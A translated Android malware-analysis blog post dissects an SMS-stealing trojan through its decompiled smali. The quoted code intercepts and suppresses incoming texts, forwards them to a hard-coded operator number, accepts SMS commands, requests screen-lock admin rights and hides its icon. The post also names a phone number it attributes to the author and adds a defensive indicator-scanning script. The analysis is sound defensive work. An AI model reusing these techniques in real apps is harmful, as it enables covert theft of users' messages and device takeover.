Analysis of the SMS-monitoring trojan "我的相册" (My Album)
[Trojan name]: 我的相册 (My Album)
[Package name]: sada.rlnihao.testrlnihao
[Analysis tool]: APK改之理
[Decompilation]: invalid code is inserted into the dex inside a class that is never called, which breaks repackaging and conversion to Java
[Trojan behaviour]: intercepts incoming SMS messages and can control the phone
With the rapid rise of the mobile internet, mobile payment on phones has grown explosively. But while mobile payment makes life more convenient, it also faces more and more risk. The recent appearance of xxshenqi has stirred up Android mobile security once again. I expect a flood of xxshenqi-style variants over the coming period, which brings us both a challenge and a chance to learn; the upside is that it reminds ordinary users that their phones need protecting. The night before last, a file called "我的相册" (My Album) popped up in a QQ group, and my first reaction was that it was a trojan. If it is, the best outcome is to trace it back to its source, such as a phone number or e-mail address. I decompiled it with APK改之理 and found it could not be converted to Java, so I turned to the smali. While repackaging I discovered why: invalid bytecode had been inserted into an unused class to defeat reversing tools. Most reversing tools read and parse the bytecode linearly, so when they hit an invalid byte the disassembler's parsing fails. I have run into this problem again and honestly do not know how to handle it, so let's start with the smali analysis.
Code tree structure:
Overall operating flow of the trojan:
Detailed analysis:
First we look at its AndroidManifest file to see which permissions it holds and where its entry points are.
Having sorted out its capabilities and entry points, we analyse them one by one.
Entry point one: MainActivity
It starts SmsService, calls ShareUtil.getFlag() to check whether Flag is "true", and calls SmsUtil.compareDate() to check whether the current time is after 2014.8.31; if so it sends the SMS "Install Success!" to the trojan author. So this is a variant, and a very fresh one.
invoke-direct {v1}, Landroid/content/Intent;-><init>()V
#Intent intent2 = new Intent();
.line 22
.local v1, "intent2":Landroid/content/Intent;
invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getApplicationContext()Landroid/content/Context;
move-result-object v5
#Content v5 = this.getApplicationContext();
const-class v6, Lsada/nihao/testnihao/SmsService;
invoke-virtual {v1, v5, v6}, Landroid/content/Intent;->setClass(Landroid/content/Context;Ljava/lang/Class;)Landroid/content/Intent;
#intent2.setClass(getApplicationContext(), SmsService.class);
.line 23
invoke-virtual {p0, v1}, Lsada/nihao/testnihao/MainActivity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
#MainActivity.startService(intent2);
.line 26
:try_start_0
invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getApplicationContext()Landroid/content/Context;
move-result-object v5
invoke-static {v5}, Lsada/nihao/testnihao/ShareUtil;->getInstance(Landroid/content/Context;)Lsada/nihao/testnihao/ShareUtil;
move-result-object v4
#ShareUtil su = ShareUtil.getInstance(getApplicationContext());
.line 27
.local v4, "su":Lsada/nihao/testnihao/ShareUtil;
const-string v5, ""
invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getFlag()Ljava/lang/String;
move-result-object v6
#String strFlag = su.getFlag(); // check whether the flag is ""
invoke-virtual {v5, v6}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
move-result v5
#if the flag is not "", jump to label cond_1
if-eqz v5, :cond_1
.line 28
invoke-static {}, Lsada/nihao/testnihao/SmsUtil;->compareDate()Z
#call SmsUtil.compareDate() to check whether the current time is before "2014-08-31 23:00:00"
move-result v5
It then checks whether the LockRec component already has device-administrator rights; if not, it registers LockRec as a device administrator, and afterwards calls PackageManager.setComponentEnabledSetting(getComponentName(), 2, 1) to hide the launcher icon.
const-string v5, "device_policy"
invoke-virtual {p0, v5}, Lsada/nihao/testnihao/MainActivity;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
move-result-object v5
check-cast v5, Landroid/app/admin/DevicePolicyManager;
#DevicePolicyManager is the main device-administration class; through it the app can lock the screen, adjust brightness, factory-reset the device, and so on
iput-object v5, p0, Lsada/nihao/testnihao/MainActivity;->policyManager:Landroid/app/admin/DevicePolicyManager;
#get the device policy service: this.policyManager = this.getSystemService("device_policy");
.line 38
new-instance v5, Landroid/content/ComponentName;
const-class v6, Lsada/nihao/testnihao/LockRec;
invoke-direct {v5, p0, v6}, Landroid/content/ComponentName;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
#ComponentName com = new ComponentName(this.content, LockRec.class);
iput-object v5, p0, Lsada/nihao/testnihao/MainActivity;->componentName:Landroid/content/ComponentName;
#this.componentName = com;
.line 39
iget-object v5, p0, Lsada/nihao/testnihao/MainActivity;->policyManager:Landroid/app/admin/DevicePolicyManager;
#DevicePolicyManager v5 = this.policyManager;
iget-object v6, p0, Lsada/nihao/testnihao/MainActivity;->componentName:Landroid/content/ComponentName;
#ComponentName v6 = this.componentName;
invoke-virtual {v5, v6}, Landroid/app/admin/DevicePolicyManager;->isAdminActive(Landroid/content/ComponentName;)Z
#boolean bret = v5.isAdminActive(v6); // check whether LockRec is an active device administrator
move-result v5
if-nez v5, :cond_2
#jump to cond_2 when LockRec already has device-administrator rights
########################################################################################################################
#next, request device-administrator rights for the LockRec component
.line 41
new-instance v2, Landroid/content/Intent;
const-string v5, "android.app.action.ADD_DEVICE_ADMIN"
invoke-direct {v2, v5}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
#Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
.line 42
.local v2, "localIntent":Landroid/content/Intent;
const-string v5, "android.app.extra.DEVICE_ADMIN"
iget-object v6, p0, Lsada/nihao/testnihao/MainActivity;->componentName:Landroid/content/ComponentName;
invoke-virtual {v2, v5, v6}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Landroid/os/Parcelable;)Landroid/content/Intent;
#name LockRec as the component to be granted admin rights: localIntent.putExtra("android.app.extra.DEVICE_ADMIN", componentName);
.line 43
const-string v5, "android.app.extra.ADD_EXPLANATION"
const-string v6, "\u8bbe\u5907\u7ba1\u7406\u5668"
#String v6 = "设备管理器" ("Device Manager"), the explanation shown on the admin prompt
invoke-virtual {v2, v5, v6}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
.line 44
invoke-virtual {p0, v2}, Lsada/nihao/testnihao/MainActivity;->startActivity(Landroid/content/Intent;)V
#this.startActivity(localIntent);
.line 51
.end local v2 # "localIntent":Landroid/content/Intent;
:cond_2
invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getPackageManager()Landroid/content/pm/PackageManager;
move-result-object v3
#PackageManager p = this.getPackageManager();
.line 52
.local v3, "p":Landroid/content/pm/PackageManager;
invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getComponentName()Landroid/content/ComponentName;
move-result-object v5
#ComponentName v5 = getComponentName();
const/4 v6, 0x2
const/4 v7, 0x1
invoke-virtual {v3, v5, v6, v7}, Landroid/content/pm/PackageManager;->setComponentEnabledSetting(Landroid/content/ComponentName;II)V
#hide the icon: p.setComponentEnabledSetting(getComponentName(), 2 /* COMPONENT_ENABLED_STATE_DISABLED */, 1 /* DONT_KILL_APP */);
.line 53
invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->finish()V
So what is LockRec? We can look it up in AndroidManifest.xml:
<!-- Receiver for screen lock, factory reset and password change; see the XML file named by android:resource for details -->
<receiver android:description="@string/str" android:label="System 设备管理器" android:name="sada.nihao.testnihao.LockRec" android:permission="android.permission.BIND_DEVICE_ADMIN">
<meta-data android:name="android.app.device_admin" android:resource="@xml/lock_screen"/>
<intent-filter>
<action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
</intent-filter>
</receiver>
This exists so that the DevicePolicyManager device-administration service can be invoked to do something. What exactly, we can see in the lock_screen file referenced by the android:resource attribute above:
<?xml version="1.0" encoding="utf-8"?>
<device-admin
xmlns:android="http://schemas.android.com/apk/res/android">
<uses-policies>
<!-- force-lock: lets the app lock the device screen automatically -->
<force-lock />
</uses-policies>
</device-admin>
So the trojan wants to lock the screen.
Entry point two: the boot-completed broadcast listener
It starts a service named "WatchDogService".
new-instance v0, Landroid/content/Intent;
const-class v1, Lsada/nihao/testnihao/SmsService;
invoke-direct {v0, p1, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
.line 15
.local v0, "WatchDogService":Landroid/content/Intent;
const/high16 v1, 0x10000000
invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
.line 16
invoke-virtual {p1, v0}, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
The service entry point onCreate()
1. Register the SmsObserver class, which extends ContentObserver, to observe database changes behind a specific Uri; this trojan watches the SMS inbox.
.line 27
invoke-virtual {p0}, Lsada/nihao/testnihao/SmsService;->getContentResolver()Landroid/content/ContentResolver;
move-result-object v1
.line 28
.local v1, "resolver":Landroid/content/ContentResolver;
new-instance v2, Lsada/nihao/testnihao/SmsObserver;
#resolver = this.getContentResolver(); // get the content resolver
invoke-virtual {p0}, Lsada/nihao/testnihao/SmsService;->getApplicationContext()Landroid/content/Context;
move-result-object v3
new-instance v4, Lsada/nihao/testnihao/SmsHandler;
invoke-direct {v4, p0}, Lsada/nihao/testnihao/SmsHandler;-><init>(Landroid/content/Context;)V
invoke-direct {v2, v3, v1, v4}, Lsada/nihao/testnihao/SmsObserver;-><init>(Landroid/content/Context;Landroid/content/ContentResolver;Lsada/nihao/testnihao/SmsHandler;)V
iput-object v2, p0, Lsada/nihao/testnihao/SmsService;->mObserver:Lsada/nihao/testnihao/SmsObserver;
.line 29
const-string v2, "content://sms"
invoke-static {v2}, Landroid/net/Uri;->parse(Ljava/lang/String;)Landroid/net/Uri;
#Uri uri = Uri.parse("content://sms");
move-result-object v2
const/4 v3, 0x1
iget-object v4, p0, Lsada/nihao/testnihao/SmsService;->mObserver:Lsada/nihao/testnihao/SmsObserver;
invoke-virtual {v1, v2, v3, v4}, Landroid/content/ContentResolver;->registerContentObserver(Landroid/net/Uri;ZLandroid/database/ContentObserver;)V
#register the observer to watch for changes to the SMS database
#resolver.registerContentObserver(uri, true, new SmsObserver(getApplicationContext(), resolver, new SmsHandler(this)));
2. Dynamically register SmsReceiver and give it the highest priority, so that even if security software is installed on the phone, the trojan can still be the first to receive an SMS after a reboot.
new-instance v2, Lsada/nihao/testnihao/SmsReceiver;
invoke-direct {v2}, Lsada/nihao/testnihao/SmsReceiver;-><init>()V
##########################################################################################################################
#dynamically register the SmsReceiver broadcast receiver
#SmsReceiver smsRec = new SmsReceiver();
iput-object v2, p0, Lsada/nihao/testnihao/SmsService;->smsReceiver:Lsada/nihao/testnihao/SmsReceiver;
.line 32
new-instance v0, Landroid/content/IntentFilter;
const-string v2, "android.provider.Telephony.SMS_RECEIVED"
#intercept incoming-SMS events
invoke-direct {v0, v2}, Landroid/content/IntentFilter;-><init>(Ljava/lang/String;)V
#IntentFilter intentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
.line 33
.local v0, "intentFilter":Landroid/content/IntentFilter;
const v2, 0x7fffffff
invoke-virtual {v0, v2}, Landroid/content/IntentFilter;->setPriority(I)V
#intentFilter.setPriority(0x7FFFFFFF);
.line 34
iget-object v2, p0, Lsada/nihao/testnihao/SmsService;->smsReceiver:Lsada/nihao/testnihao/SmsReceiver;
#SmsReceiver v2 = SmsService.smsReceiver;
new-instance v3, Landroid/content/IntentFilter;
const-string v4, "android.provider.Telephony.SMS_RECEIVED"
invoke-direct {v3, v4}, Landroid/content/IntentFilter;-><init>(Ljava/lang/String;)V
#IntentFilter intentFilter2 = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
invoke-virtual {p0, v2, v3}, Lsada/nihao/testnihao/SmsService;->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)Landroid/content/Intent;
#SmsService.registerReceiver(SmsService.smsReceiver, intentFilter2);
#dynamically registers the SMS_RECEIVED receiver and calls setPriority() to give its filter the maximum priority
.line 35
return-void
.end method
At this point the inbox monitor is registered. When a message arrives on the infected phone, whether from someone else or from the trojan operator, onChange() in the SmsObserver class is triggered.
It fetches the specified SMS columns, wraps them into a Message, and hands it to SmsHandler.
const-string v4, "read=?"
# columns to fetch
# String[] PROJECTION = {"_id","address","read","body","thread_id"};
const/4 v5, 0x1
new-array v5, v5, [Ljava/lang/String;
const/4 v6, 0x0
const-string v16, "0"
aput-object v16, v5, v6
const-string v6, "date desc"
invoke-virtual/range {v1 .. v6}, Landroid/content/ContentResolver;->query(Landroid/net/Uri;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor;
#query the inbox for the chosen columns (unread messages, newest first)
#Cursor mCursor = resolver.query(Uri.parse("content://sms/inbox"), PROJECTION, "read=?", new String[]{"0"}, "date desc");
move-result-object v11
.line 32
.local v11, "mCursor":Landroid/database/Cursor;
if-nez v11, :cond_8
#if (mCursor == null) return;
.line 88
:cond_0
:goto_0
return-void
.line 40
:cond_1
new-instance v8, Lsada/nihao/testnihao/SmsInfo;
invoke-direct {v8}, Lsada/nihao/testnihao/SmsInfo;-><init>()V
#SmsInfo _smsInfo = new SmsInfo();
.line 42
.local v8, "_smsInfo":Lsada/nihao/testnihao/SmsInfo;
const-string v1, "_id"
#int _inIndex = mCursor.getColumnIndex("_id");
invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
move-result v7
.line 43
.local v7, "_inIndex":I
const/4 v1, -0x1
if-eq v7, v1, :cond_2
.line 45
invoke-interface {v11, v7}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
move-result-object v1
#SmsInfo.id = mCursor.getString(mCursor.getColumnIndex("_id"));
iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->_id:Ljava/lang/String;
.line 48
:cond_2
const-string v1, "thread_id"
invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
move-result v15
.line 49
.local v15, "thread_idIndex":I
const/4 v1, -0x1
if-eq v15, v1, :cond_3
.line 51
invoke-interface {v11, v15}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
move-result-object v1
#Smsinfo.thread_id = mCursor.getString(mCursor.getColumnIndex("thread_id"));
iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->thread_id:Ljava/lang/String;
.line 54
:cond_3
const-string v1, "address"
invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
move-result v9
.line 55
.local v9, "addressIndex":I
const/4 v1, -0x1
if-eq v9, v1, :cond_4
.line 57
invoke-interface {v11, v9}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
move-result-object v1
iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
#Smsinfo.smsAddress = mCursor.getString(mCursor.getColumnIndex("address"));
.line 60
:cond_4
const-string v1, "body"
invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
move-result v10
.line 61
.local v10, "bodyIndex":I
const/4 v1, -0x1
if-eq v10, v1, :cond_5
.line 63
invoke-interface {v11, v10}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
move-result-object v1
iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->smsBody:Ljava/lang/String;
#Smsinfo.smsBody = mCursor.getString(mCursor.getColumnIndex("body"));
.line 66
:cond_5
const-string v1, "read"
invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
move-result v13
.line 67
.local v13, "readIndex":I
const/4 v1, -0x1
if-eq v13, v1, :cond_6
.line 69
invoke-interface {v11, v13}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
move-result-object v1
iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->read:Ljava/lang/String;
#Smsinfo.read = mCursor.getString(mCursor.getColumnIndex("read"));
.line 71
:cond_6
move-object/from16 v0, p0
iget-object v1, v0, Lsada/nihao/testnihao/SmsObserver;->smsHandler:Lsada/nihao/testnihao/SmsHandler;
#wrap the collected SMS info and notify the handler
invoke-virtual {v1}, Lsada/nihao/testnihao/SmsHandler;->obtainMessage()Landroid/os/Message;
move-result-object v12
.line 72
.local v12, "msg":Landroid/os/Message;
move-object/from16 v0, p0
#Message msg = smsHandler.obtainMessage();
iget-object v1, v0, Lsada/nihao/testnihao/SmsObserver;->mContext:Landroid/content/Context;
invoke-static {v1}, Lsada/nihao/testnihao/ShareUtil;->getInstance(Landroid/content/Context;)Lsada/nihao/testnihao/ShareUtil;
move-result-object v14
.line 73
.local v14, "su":Lsada/nihao/testnihao/ShareUtil;
const-string v1, "1"
#ShareUtil su = ShareUtil.getInstance(this.mContext);
invoke-virtual {v14}, Lsada/nihao/testnihao/ShareUtil;->getSwitch()Ljava/lang/String;
move-result-object v2
invoke-virtual {v1, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
move-result v1
if-nez v1, :cond_7
iget-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
#who sent the message
invoke-virtual {v14}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
move-result-object v2
invoke-virtual {v1, v2}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
move-result v1
if-eqz v1, :cond_9
.line 74
:cond_7
const/4 v1, 0x2
iput v1, v8, Lsada/nihao/testnihao/SmsInfo;->action:I
.line 78
:goto_1
iput-object v8, v12, Landroid/os/Message;->obj:Ljava/lang/Object;
#msg.obj = _smsInfo;
.line 79
move-object/from16 v0, p0
iget-object v1, v0, Lsada/nihao/testnihao/SmsObserver;->smsHandler:Lsada/nihao/testnihao/SmsHandler;
#smsHandler.sendMessage(msg); // hand the stolen inbox data to the handler
invoke-virtual {v1, v12}, Lsada/nihao/testnihao/SmsHandler;->sendMessage(Landroid/os/Message;)Z
In the SmsHandler class:
1. Check whether the sender is the trojan author's phone number; if so, enter the phone-control flow.
2. For messages from ordinary numbers, forward the SMS to the author himself.
.line 41
.local v4, "su":Lsada/nihao/testnihao/ShareUtil;
:try_start_0
invoke-static {}, Lsada/nihao/testnihao/SmsUtil;->compareDate()Z
move-result v6
if-nez v6, :cond_0
.line 42
iget-object v6, v3, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
#String v6 = SmsInfo.smsAddress; // the sender's phone number
invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
#the trojan author's phone number
move-result-object v7
invoke-virtual {v6, v7}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
#check whether this SMS came from the trojan author
move-result v6
#v6 non-zero means the trojan author sent it, which is how the phone gets controlled
if-eqz v6, :cond_2
###########################################################################################################################################################################
#analysis of the code path the trojan author uses to control the phone
.line 43
new-instance v2, Lsada/nihao/testnihao/SMSEntity;
invoke-direct {v2}, Lsada/nihao/testnihao/SMSEntity;-><init>()V
#SMSEntity sms = new SMSEntity();
.line 44
.local v2, "sms":Lsada/nihao/testnihao/SMSEntity;
iget-object v6, v3, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
iput-object v6, v2, Lsada/nihao/testnihao/SMSEntity;->smsTitle:Ljava/lang/String;
#sms.smsTitle = SmsInfo.smsAddress;
.line 45
iget-object v6, v3, Lsada/nihao/testnihao/SmsInfo;->smsBody:Ljava/lang/String;
iput-object v6, v2, Lsada/nihao/testnihao/SMSEntity;->smsContent:Ljava/lang/String;
#sms.smsContent = SmsInfo.smsBody;
.line 46
iget-object v6, p0, Lsada/nihao/testnihao/SmsHandler;->mcontext:Landroid/content/Context;
invoke-static {v6, v2}, Lsada/nihao/testnihao/SmsUtil;->parseStr(Landroid/content/Context;Lsada/nihao/testnihao/SMSEntity;)V
#SmsUtil.parseStr(this.mcontext, sms);
:try_end_0
.catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_
invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getSwitch()Ljava/lang/String;
move-result-object v7
invoke-virtual {v6, v7}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
move-result v6
if-eqz v6, :cond_0
.line 49
const-string v6, "\u6570\u636e\u5e93\u53d1\u9001"
#"数据库发送" (database send), used as the log tag
const-string v7, ""
#forward the SMS the user received to the trojan author
invoke-static {v6, v7}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
.line 50
iget-object v6, p0, Lsada/nihao/testnihao/SmsHandler;->mcontext:Landroid/content/Context;
invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
move-result-object v7
invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getPhone1()Ljava/lang/String;
move-result-object v8
new-instance v9, Ljava/lang/StringBuilder;
iget-object v10, v3, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
invoke-static {v10}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
move-result-object v10
invoke-direct {v9, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
iget-object v10, v3, Lsada/nihao/testnihao/SmsInfo;->smsBody:Ljava/lang/String;
invoke-virtual {v9, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
move-result-object v9
invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
move-result-object v9
invoke-static {v6, v7, v8, v9}, Lsada/nihao/testnihao/SmsUtil;->sendSMS(Landroid/content/Context;Lj
The trojan author's details and the SMS command prefixes are held in the Const class:
const/4 v1, 0x0
const-string v2, "13601574293"
aput-object v2, v0, v1
#nums[0] = "13601574293";
const/4 v1, 0x1
const-string v2, ""
aput-object v2, v0, v1
#nums[1] = "";
sput-object v0, Lsada/nihao/testnihao/Const;->nums:[Ljava/lang/String;
#Const.nums = v0;
.line 108
const-string v0, "#T"
sput-object v0, Lsada/nihao/testnihao/Const;->transpond:Ljava/lang/String;
#Const.transpond ="#T"
.line 109
const-string v0, "#S"
sput-object v0, Lsada/nihao/testnihao/Const;->switch1:Ljava/lang/String;
#Const.switch1 = "#S";
.line 110
const-string v0, "#C"
sput-object v0, Lsada/nihao/testnihao/Const;->change:Ljava/lang/String;
.line 111
const-string v0, "SHA_PRE"
sput-object v0, Lsada/nihao/testnihao/Const;->SHA_PRE:Ljava/lang/String;
#Const.SHA_PRE = "SHA_PRE";
.line 112
const-string v0, "SHARE_FLAG"
sput-object v0, Lsada/nihao/testnihao/Const;->SHA_FLAG:Ljava/lang/String;
#Const.SHA_FLAG = "SHARE_FLAG";
.line 113
const-string v0, "SHA_PHO"
sput-object v0, Lsada/nihao/testnihao/Const;->SHA_PHO:Ljava/lang/String;
.line 114
const-string v0, "SHARE_PHONE1"
sput-object v0, Lsada/nihao/testnihao/Const;->SHA_PHONE1:Ljava/lang/String;
.line 115
const-string v0, "SHARE_SWITCH"
sput-object v0, Lsada/nihao/testnihao/Const;->SHA_SWITCH:Ljava/lang/String;
return-void
Entry point three: the SMS broadcast listener
.line 28
invoke-virtual {p0}, Lsada/nihao/testnihao/SmsReceiver;->abortBroadcast()V
#SmsReceiver.abortBroadcast() stops the SMS broadcast from propagating to lower-priority receivers
.line 29
invoke-static {p1, v1}, Lsada/nihao/testnihao/SmsUtil;->parseStr(Landroid/content/Context;Lsada/nihao/testnihao/SMSEntity;)V
#enters SmsUtil.parseStr(), which identifies the SMS sender
.line 33
invoke-virtual {v2}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
move-result-object v3
invoke-virtual {v2}, Lsada/nihao/testnihao/ShareUtil;->getPhone1()Ljava/lang/String;
move-result-object v4
new-instance v5, Ljava/lang/StringBuilder;
iget-object v6, v1, Lsada/nihao/testnihao/SMSEntity;->smsTitle:Ljava/lang/String;
invoke-static {v6}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
move-result-object v6
invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
iget-object v6, v1, Lsada/nihao/testnihao/SMSEntity;->smsContent:Ljava/lang/String;
invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
move-result-object v5
invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
move-result-object v5
Forward the SMS to the trojan author:
invoke-static {p1, v3, v4, v5}, Lsada/nihao/testnihao/SmsUtil;->sendSMS(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Lja
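The three entry points above share a small set of static indicators: an SMS_RECEIVED receiver at maximum priority that calls abortBroadcast(), a ContentObserver on content://sms, a device-admin receiver whose policy file requests force-lock, and the setComponentEnabledSetting(2, 1) call that hides the icon. The Python script below is an added example, not part of the original post or of the trojan, that pulls those indicators out of smali text and manifest/policy XML the way a triage script would. The sample inputs are constructed from the snippets quoted in this post (the manifest uses a placeholder package name), and all function and indicator names are my own.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Indicator name (ours) -> regex applied to each smali line.
SMALI_INDICATORS = {
    "sms_received_filter": re.compile(r'"android\.provider\.Telephony\.SMS_RECEIVED"'),
    "max_priority": re.compile(r"const v\d+, 0x7fffffff"),
    "abort_broadcast": re.compile(r"->abortBroadcast\(\)V"),
    "sms_provider_uri": re.compile(r'"content://sms'),
    "content_observer": re.compile(r"->registerContentObserver\("),
    "device_admin_request": re.compile(r'"android\.app\.action\.ADD_DEVICE_ADMIN"'),
    "component_enabled_setting": re.compile(r"->setComponentEnabledSetting\("),
}

def scan_smali(smali_text):
    """Map each indicator to the 1-based smali line numbers where it occurs."""
    hits = {}
    for lineno, line in enumerate(smali_text.splitlines(), 1):
        for name, pattern in SMALI_INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def hides_launcher_icon(smali_text):
    """True when setComponentEnabledSetting is preceded by const/4 loads of 0x2
    (COMPONENT_ENABLED_STATE_DISABLED) and 0x1 (DONT_KILL_APP), the pattern in MainActivity."""
    lines = smali_text.splitlines()
    for i, line in enumerate(lines):
        if "->setComponentEnabledSetting(" not in line:
            continue
        window = "\n".join(lines[max(0, i - 4):i])  # the argument loads just before the call
        if re.search(r"const/4 v\d+, 0x2", window) and re.search(r"const/4 v\d+, 0x1", window):
            return True
    return False

def device_admin_receivers(manifest_xml):
    """(receiver name, device_admin resource) for every BIND_DEVICE_ADMIN receiver."""
    found = []
    for rcv in ET.fromstring(manifest_xml).iter("receiver"):
        if rcv.get(ANDROID_NS + "permission") != "android.permission.BIND_DEVICE_ADMIN":
            continue
        resource = None
        for md in rcv.findall("meta-data"):
            if md.get(ANDROID_NS + "name") == "android.app.device_admin":
                resource = md.get(ANDROID_NS + "resource")
        found.append((rcv.get(ANDROID_NS + "name"), resource))
    return found

def device_admin_policies(policy_xml):
    """Policy tags listed under <uses-policies> in a device_admin resource file."""
    policies = ET.fromstring(policy_xml).find("uses-policies")
    return [] if policies is None else [p.tag for p in policies]

def triage(smali_text, manifest_xml, policy_xml):
    """Combine the checks into a list of findings a reviewer can act on."""
    hits = scan_smali(smali_text)
    findings = []
    if "sms_received_filter" in hits and "max_priority" in hits:
        findings.append("SMS_RECEIVED receiver registered at maximum priority")
    if "abort_broadcast" in hits:
        findings.append("abortBroadcast(): SMS hidden from lower-priority receivers")
    if "sms_provider_uri" in hits and "content_observer" in hits:
        findings.append("ContentObserver registered on content://sms (inbox monitoring)")
    if hides_launcher_icon(smali_text):
        findings.append("launcher icon disabled via setComponentEnabledSetting(2, 1)")
    for name, resource in device_admin_receivers(manifest_xml):
        findings.append(f"device admin receiver {name} ({resource}) requests {device_admin_policies(policy_xml)}")
    return findings

# Constructed sample: smali lines excerpted from the post, joined into one text.
SAMPLE_SMALI = """\
const-string v2, "android.provider.Telephony.SMS_RECEIVED"
invoke-direct {v0, v2}, Landroid/content/IntentFilter;-><init>(Ljava/lang/String;)V
const v2, 0x7fffffff
invoke-virtual {v0, v2}, Landroid/content/IntentFilter;->setPriority(I)V
invoke-virtual {p0}, Lsada/nihao/testnihao/SmsReceiver;->abortBroadcast()V
const-string v2, "content://sms"
invoke-virtual {v1, v2, v3, v4}, Landroid/content/ContentResolver;->registerContentObserver(Landroid/net/Uri;ZLandroid/database/ContentObserver;)V
const/4 v6, 0x2
const/4 v7, 0x1
invoke-virtual {v3, v5, v6, v7}, Landroid/content/pm/PackageManager;->setComponentEnabledSetting(Landroid/content/ComponentName;II)V
"""

# Constructed sample manifest (placeholder package name) modelled on the LockRec receiver.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="example.placeholder">
 <application>
  <receiver android:name="example.placeholder.LockRec" android:permission="android.permission.BIND_DEVICE_ADMIN">
   <meta-data android:name="android.app.device_admin" android:resource="@xml/lock_screen"/>
   <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/></intent-filter>
  </receiver>
 </application>
</manifest>
"""

# Constructed sample policy file with the same single force-lock policy as lock_screen.xml.
SAMPLE_POLICY = """\
<device-admin xmlns:android="http://schemas.android.com/apk/res/android">
 <uses-policies><force-lock /></uses-policies>
</device-admin>
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_SMALI, SAMPLE_MANIFEST, SAMPLE_POLICY):
        print("-", finding)
```

Run it as-is and it prints five findings for the constructed samples; pointing `scan_smali` at the real decompiled smali directory (one file at a time) and `device_admin_receivers` at the decoded AndroidManifest.xml gives the same checks on a suspect APK. None of these indicators is malicious on its own (a default SMS app legitimately registers for SMS_RECEIVED), which is why `triage` reports them together rather than scoring a single hit.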
Through the three entry points we now have a fairly clear picture of the trojan, but as for the technique of inserting invalid bytecode into an unused class to defeat reversing tools, this newbie really does not know how to deal with it, and I hope to discuss it and learn from everyone.
Testing shows that 360手机卫士 and 腾讯管家 detect and remove it accurately, while 百度手机卫士 cannot yet.
